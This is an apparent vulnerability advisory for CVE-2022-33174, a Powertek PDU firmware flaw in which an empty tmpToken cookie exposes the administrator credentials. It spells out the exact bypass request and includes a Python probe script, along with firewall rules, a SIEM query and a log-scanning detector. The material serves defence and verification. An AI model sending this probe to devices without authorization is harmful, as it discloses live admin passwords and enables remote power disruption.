CVE-2022-33174

9.8 CRITICAL

📋 TL;DR

CVE-2022-33174 is an authentication bypass in Power Distribution Units (PDUs) that run Powertek firmware. The web interface's data retrieval endpoint, /cgi/get_param.cgi, checks for an active session via the tmpToken cookie, but an unauthenticated HTTP request that sets the cookie to an empty value followed by a semicolon (`Cookie: tmpToken=;`) passes that check. The response then includes the administrative username (sys.su.name) and password (sys.passwd) in cleartext. Multiple PDU brands ship Powertek firmware; versions before 3.30.30 are affected.

💻 Affected Systems

Products:
  • Power Distribution Units (PDUs) from multiple brands using Powertek firmware
Versions: All versions before 3.30.30
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web interface on port 80/443. Several PDU brands ship Powertek firmware under their own names, so an affected unit may not be listed as a Powertek product by its vendor; check the firmware version rather than the badge.

📦 What is this software?

Powertek firmware is the embedded management software on Power Distribution Units sold under several brand names. Its HTTP/HTTPS web interface is used to monitor the unit and to switch outlets remotely; the /cgi/get_param.cgi endpoint serves device parameters to that interface and is supposed to require an active session.
⚠️ Risk & Real-World Impact

🔴 Worst Case

Full compromise of the PDU infrastructure: attackers log in with the disclosed administrator credentials, remotely power-cycle critical equipment, disrupt operations, and reuse the credentials to pivot to other systems that share them.

🟠 Likely Case

Attackers gain administrative access to the PDUs, enabling unauthorized power control of connected devices and credential theft for further attacks.

🟢 If Mitigated

Exposure is limited to the management segment when strict access controls are in place, but anyone who can reach the endpoint still obtains the credentials without a session, and those credentials may be reused elsewhere if the PDU shares passwords with other systems.

🌐 Internet-Facing: HIGH - Directly exploitable via HTTP requests with no authentication required, making internet-exposed PDUs immediate targets.
🏢 Internal Only: HIGH - Even internally, attackers can exploit this to gain administrative access and disrupt operations.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

A single unauthenticated HTTP GET to /cgi/get_param.cgi with the tmpToken cookie set to an empty value (`tmpToken=;`) is enough; no special tooling or skill is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.30.30

Vendor Advisory: Not publicly available from a central vendor source (multiple brands affected)

Restart Required: Yes

Instructions:

1. Contact your PDU vendor for firmware update 3.30.30 or later.
2. Download the firmware file.
3. Access the PDU web interface as admin.
4. Navigate to the firmware update section.
5. Upload and apply the new firmware.
6. Reboot the PDU.

🔧 Temporary Workarounds

Network Segmentation (platform: all)

Isolate PDU management interfaces from untrusted networks: place them on a dedicated management VLAN that is reachable only from jump hosts.

Access Control Lists (platform: linux)

Restrict HTTP/HTTPS access to the PDU web interface to authorized management IPs only. The PDU firmware itself cannot run these rules; apply them on a Linux firewall or router that forwards traffic to the PDU, filtering in the FORWARD chain on the PDU's address. Order matters: the ACCEPT rules must come before the DROP rules, so use -I instead of -A if the chain already accepts forwarded traffic.

# Allow the PDU web interface only from the trusted management host
iptables -A FORWARD -d [PDU_IP] -p tcp --dport 80  -s [TRUSTED_IP] -j ACCEPT
iptables -A FORWARD -d [PDU_IP] -p tcp --dport 443 -s [TRUSTED_IP] -j ACCEPT
# Drop every other client's access to the PDU web interface
iptables -A FORWARD -d [PDU_IP] -p tcp --dport 80  -j DROP
iptables -A FORWARD -d [PDU_IP] -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

  • Disable web interface if not required and use alternative management methods
  • Implement strict network segmentation with firewall rules blocking all external access to PDU management ports

🔍 How to Verify

Check if Vulnerable:

Send an unauthenticated HTTP GET request to /cgi/get_param.cgi with the header `Cookie: tmpToken=;` (an empty token value followed by a semicolon) and check whether the response contains sys.passwd or sys.su.name values. Only do this against devices you are authorized to test; the request returns live administrator credentials on an unpatched unit.

Check Version:

Check the web interface login page or system info page for the firmware version. If the login page embeds the version string, a quick check is: curl -s http://[PDU_IP]/ | grep -i version (this only works when the page actually includes it; otherwise use the system info page after logging in).

Verify Fix Applied:

After patching, send the same request again. A fixed unit should answer with an error or an empty response instead of credential values; if sys.passwd or sys.su.name values are still returned, the update did not take effect.
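The "Check if Vulnerable" and "Verify Fix Applied" steps are the same request with a different expected answer, so the following script, added here as an example and not the advisory's or any vendor's tool, sends the request described above and classifies the reply. It assumes the endpoint answers on the plain path with no query string (the page names none; pass `query` if your build needs one), and it accepts key=value, JSON-style and XML-style encodings of the returned values because the page does not say which one the firmware uses.

```python
"""Check a Powertek-based PDU for CVE-2022-33174 and classify the answer.

Added example; not code from the advisory or from any PDU vendor. It issues the
request the "How to Verify" section describes: an unauthenticated GET to
/cgi/get_param.cgi with the Cookie header set to "tmpToken=;". The page gives no
query string, so none is sent unless you pass one (assumption: some builds may
need it). Run it only against devices you are authorized to test.
"""
import re
import ssl
import urllib.error
import urllib.request
from typing import List, Optional

PROBE_PATH = "/cgi/get_param.cgi"
PROBE_COOKIE = "tmpToken=;"                 # empty tmpToken value followed by a semicolon
CRED_KEYS = ("sys.passwd", "sys.su.name")   # the values the advisory says are disclosed


def build_probe(host: str, scheme: str = "http",
                query: Optional[str] = None) -> urllib.request.Request:
    """Build the unauthenticated probe request; `query` is an optional, assumed query string."""
    url = f"{scheme}://{host}{PROBE_PATH}"
    if query:
        url += "?" + query
    req = urllib.request.Request(url, method="GET")
    req.add_header("Cookie", PROBE_COOKIE)
    return req


# key, optional closing quote, separator (=, : or an XML tag close), optional opening
# quote, then at least one character of value. Only spaces/tabs are skipped after the
# separator, so a key with an empty value does not swallow the next line as its "value".
_VALUE_RE = {k: re.compile(re.escape(k) + r'"?[ \t]*[=:>][ \t]*"?([^\s<&"]+)')
             for k in CRED_KEYS}


def leaked_keys(body: str) -> List[str]:
    """Return the credential keys that come back with a non-empty value.

    The advisory only says the sys.passwd / sys.su.name values are returned, not in
    which encoding, so this accepts key=value, key:value, "key":"value" and <key>value</key>.
    """
    return [k for k in CRED_KEYS if _VALUE_RE[k].search(body)]


def classify(status: int, body: str) -> str:
    """'vulnerable' if credentials came back without a session; 'not-vulnerable' if the
    session check held (error status or empty body, which is how the page says a patched
    unit answers); otherwise 'inconclusive' (endpoint moved, unknown format, etc.)."""
    if status == 200 and leaked_keys(body):
        return "vulnerable"
    if status in (401, 403) or (status == 200 and not body.strip()):
        return "not-vulnerable"
    return "inconclusive"


def probe(host: str, scheme: str = "http", query: Optional[str] = None,
          insecure: bool = False, timeout: float = 5.0) -> str:
    """Send the probe and classify the reply. insecure=True skips TLS verification,
    which PDUs with self-signed certificates usually require."""
    ctx = ssl._create_unverified_context() if insecure else None
    req = build_probe(host, scheme, query)
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return classify(resp.status, resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:      # 4xx/5xx replies still carry a status and body
        return classify(e.code, e.read().decode(errors="replace"))


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]))
```

Run it as `python3 probe.py 192.0.2.10` before and after the firmware update; "vulnerable" before and "not-vulnerable" after confirms the fix took. An "inconclusive" result means the unit answered in a way this matcher does not recognise, so inspect the raw response by hand rather than assuming the device is safe.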

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests to /cgi/get_param.cgi whose tmpToken cookie is present but empty (`tmpToken=;` or `tmpToken=` at the end of the Cookie header). Note that every Cookie header carrying more than one cookie contains semicolons, so the semicolon alone is not a signature; the empty session token on this path is.
  • Requests to /cgi/get_param.cgi from a source that has no preceding successful login, followed shortly by a successful administrative login from that or another unexpected source (the stolen credentials being used).

Network Indicators:

  • HTTP GET requests to /cgi/get_param.cgi with a Cookie header containing 'tmpToken=;' (or ending in 'tmpToken='), especially from hosts outside the management segment or with scripting user agents.
  • Administrative logins to the PDU web interface from unexpected source IPs after such a request, and unexpected outlet power-state changes; the bug discloses credentials rather than executing code, so the follow-on activity is a login, not a callback from the PDU.

SIEM Query:

source="pdulogs" AND url="/cgi/get_param.cgi" AND (cookie="*tmpToken=;*" OR cookie="*tmpToken=")
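When the PDU sits behind a reverse proxy or firewall that logs the request's Cookie header, the SIEM query above can be reproduced offline. The script below is an added example for this section, not vendor tooling (the PDU firmware itself exposes no such log); it assumes combined-format access lines with the Cookie header appended as one more quoted field, and the sample lines in it are constructed. It implements the indicator as stated: the vulnerable path plus a tmpToken cookie that is present but empty, which is what distinguishes the bypass from an ordinary session request.

```python
"""Flag CVE-2022-33174 session-bypass attempts in web-access logs for a PDU.

Added example for this page's detection section; it is not vendor tooling and the
PDU firmware itself exposes no such log. Assumption: a reverse proxy or firewall in
front of the PDU writes combined-format access lines with the request's Cookie
header appended as a final quoted field. SAMPLE_LOG below is constructed.
"""
import re
from typing import Dict, List

TARGET_PATH = "/cgi/get_param.cgi"
SESSION_COOKIE = "tmpToken"

# src ident user [timestamp] "METHOD target PROTO" status bytes "referer" "agent" "cookie"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*" "(?P<cookie>[^"]*)"'
)


def parse_cookie(header: str) -> Dict[str, str]:
    """Split a Cookie header into {name: value}; 'tmpToken=' and a bare 'tmpToken' both give ''."""
    jar: Dict[str, str] = {}
    for part in header.split(";"):
        part = part.strip()
        if part:
            name, _, value = part.partition("=")
            jar[name.strip()] = value.strip()
    return jar


def is_bypass_attempt(target: str, cookie_header: str) -> bool:
    """True for a get_param.cgi request whose tmpToken cookie is present but empty.

    Every header that carries more than one cookie contains semicolons, so "cookie
    contains ;" is not a usable signature; the signal is an *empty* session token
    sent to this specific path (query string ignored).
    """
    if target.split("?", 1)[0] != TARGET_PATH:
        return False
    jar = parse_cookie(cookie_header)
    return SESSION_COOKIE in jar and jar[SESSION_COOKIE] == ""


def scan(lines: List[str]) -> List[dict]:
    """Return one record per bypass attempt. 'succeeded' is True when the unit answered
    200, i.e. it is still unpatched and the credential values were served."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_bypass_attempt(m["target"], m["cookie"]):
            hits.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"]),
                         "succeeded": m["status"] == "200"})
    return hits


# Constructed sample: a legitimate session, a successful bypass, an empty tmpToken on a
# page that is not the vulnerable endpoint, and a bypass attempt against a patched unit.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jul/2022:12:00:01 +0000] "GET /cgi/get_param.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0" "tmpToken=3f9a1c; lang=en"',
    '198.51.100.7 - - [10/Jul/2022:12:00:09 +0000] "GET /cgi/get_param.cgi HTTP/1.1" 200 348 "-" "curl/7.81.0" "tmpToken=;"',
    '198.51.100.7 - - [10/Jul/2022:12:00:10 +0000] "GET /index.htm HTTP/1.1" 200 2048 "-" "curl/7.81.0" "tmpToken=;"',
    '203.0.113.9 - - [12/Jul/2022:08:15:42 +0000] "GET /cgi/get_param.cgi HTTP/1.1" 403 0 "-" "python-requests/2.28" "tmpToken="',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with `succeeded` True on a unit you believe is patched is the stronger alert: it means the credentials were actually served and should be rotated, not just that someone probed. Adjust LOG_RE to your proxy's log format; the cookie parsing and path check do not depend on it.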
